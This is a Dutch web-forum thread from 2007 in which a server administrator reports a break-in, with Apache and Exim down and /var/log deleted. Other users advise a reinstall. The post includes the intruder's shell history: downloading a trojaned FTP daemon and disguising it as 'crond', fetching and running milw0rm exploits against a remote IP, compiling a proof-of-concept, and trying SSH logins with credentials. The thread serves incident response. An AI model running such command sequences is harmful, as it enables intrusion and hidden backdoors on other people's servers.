LinkBack URL
About LinkBacksApachi offline, errorlog weg??
Mijn server is niet meer bereikbaar.. apachie en exim offline, als ik via ssh inlog om te kijken wat er gebeurd is, dat zie ik dat de complete /var/log directory weg is?????
lijkt op een hack?????? of kan dit ook wat anders zijn
ben gehackt
hier mijn history :
151 wget http://www.netsw.org/net/ip/filetran...d-3.012.tar.gz && tar zxvf ftpd-3.012.tar.gz && rm -rf ftpd-
3.012.tar.gz && mv ftpd-3.012 bin;
152 cd bin && ./configure;
153 cd src/common && rm -rf tweak.h && wget http://www.geocities.com/xtremeacidb...rces/tweak.txt -O tweak.h && cd ..
&& cd ..;
154 cd standard/etc && rm -rf limits.cfg && rm -rf ftpd.reg;
155 wget http://www.geocities.com/xtremeacidb...ces/limits.txt -O limits.cfg;
156 wget http://www.geocities.com/xtremeacidb...urces/ftpd.txt -O ftpd.reg;
157 cd .. && cd .. && export PATH=$PATH:/usr/bin && make && cp bin/* standard/sbin && cd standard/sbi
158 ;s =a;
159 ls -al
160 cd standard/sbin
161 ls -al
162 mv ftpd crond
163 pwd
164 cd /home/admin
165 cat .bash_histroy |grep z
166 cat .bash_history |grep z
167 ps -ax
168 exit
169 ssh admind@80.86.82.174
170 wget http://wwwhome.ewi.utwente.nl/~214502j/test/file.dat -O cacti.php
171 wget http://www.milw0rm.com/exploits/download/3029.php -O cacti.php
172 php cacti.php
173 php cacti.php 80.86.82.174 /cacti/ ls -al
174 pico cacti.php
175 php cacti.php 80.86.82.174 /cacti/ ls -al
176 wget http://www.milw0rm.com/exploits/download/2017.pl -O wm.pl
177 perl wm.pl
178 chmod 777 wm.pl
179 perl wm.pl
180 rm wm.pl
181 rm cacti.pgp
182 rm cacti.php
183 ssh root@80.86.82.174
184 ssh admind:griggle@80.86.82.174
185 telnet 80.86.82.174 3000
186 telnet 80.86.82.174 3000ssh ad
187 ssh admin@84.243.235.203
188 wget http://www.sqlhack.com/poc.c
189 gcc -O3 -o poc poc.c
190 ./poc
191 ./poc 716dcb9143a1d329
192 w
advertentie
Evenementen voor de komende 60 Dag(en)
Resultaten 1 tot 4 van de 4
Onderwerp: log directory weg????
-
23/03/07 09:16log directory weg????
-
23/03/07 10:31myH2Oservers3.291 Berichten- Ingeschreven
- 22/05/05
- Locatie
- Purmerend
2 Berichten zijn liked
Bedrijf: myH2Oservers
URL: www.myh2oservers.com
Registrar SIDN: Ja
KvK nummer: 37119451
Ondernemingsnummer: nvt
al die milw0rm exploits, heb je die zelf ingevoerd of heb je geen idee waar het vandaan komt? Anders zou ik die eerst eens doornemen...
En ik moet beter lezen
Ik zou zeggen download die hacks eens (zijn textfiles) en neem eens door wat ze doen. Je bent inderdaad gehacked. Als je de tijd en middelen hebt zou ik zeggen: doe een reinstall van je server, wie weet wat er nog meer is achtergelaten behalve een log-dir die weg is.
-
23/03/07 10:44Het verwijderen van de /var/log directory vereist normaliter root privileges, wat dus betekent dat de hacker deze dan ook heeft / had. Reinstall lijkt mij dan ook de enigste optie.
- advertentie
-
23/03/07 11:31Yep, heb geluk dat ik 1x permaand 1 van mijn 2 raid schijven wissel, en de 3e als backup houd, en nog meer geluk dat ik dit net een paar dagen terug heb gedaan.... de rest gelukkig wel backups
Nu als een speer naar het data center, en daarna mijn doos nog meer dicht timmeren..
Forum Rechten
- Je mag geen nieuwe onderwerpen plaatsen
- Je mag geen reacties plaatsen
- Je mag geen bijlagen toevoegen
- Je mag jouw berichten niet wijzigen
